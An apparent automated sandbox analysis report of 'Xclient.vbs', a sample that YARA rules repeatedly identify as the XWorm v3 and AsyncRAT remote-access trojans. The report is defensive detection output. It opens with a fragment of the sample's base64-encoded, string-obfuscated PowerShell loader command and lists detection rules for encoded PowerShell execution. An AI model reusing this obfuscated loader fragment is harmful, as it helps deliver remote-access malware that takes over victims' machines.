GwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgJump to behavior
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8B715F5_2_00007FFD9B8B715F
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8BD0965_2_00007FFD9B8BD096
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8C40D65_2_00007FFD9B8C40D6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B8BDE425_2_00007FFD9B8BDE42
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B9766025_2_00007FFD9B976602
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9BB805CD5_2_00007FFD9BB805CD
                Source: Xclient.vbsInitial sample: Strings found which are bigger than 50
                Source: unknownDriver loaded: C:\Windows\System32\cdd.dll
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3663Jump to behavior
                Source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601de4450.13.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000005.00000002.2325412269.000001D3133AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000012.00000002.2074612069.000001E1AA261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000017.00000002.2248750195.000002CC07141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3152, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7312, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3130bafb0.5.raw.unpack, tcsnk.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3130b0098.1.raw.unpack, tcsnk.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.powershell.exe.1d3130da550.6.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 5.2.powershell.exe.1d3130da550.6.raw.unpack, tcsnk.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
